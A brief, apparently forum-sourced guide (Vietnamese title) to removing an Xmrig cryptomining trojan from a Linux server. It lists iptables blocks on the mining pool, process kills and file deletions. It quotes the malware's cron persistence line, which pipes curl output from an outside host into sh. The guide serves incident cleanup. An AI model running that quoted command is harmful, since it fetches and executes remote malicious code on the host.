Hướng dẫn tìm và fix lỗi trojan đào coin Xmrig Trojan Miner
- On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
- Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
- Removed the directory /opt/yam.
- Removed /root/.ssh/KHK75NEOiq.
- Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
- Stopped the minerd process - pkill minerd.
- Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
https://security.stackexchange.com/q...s-ec2-instance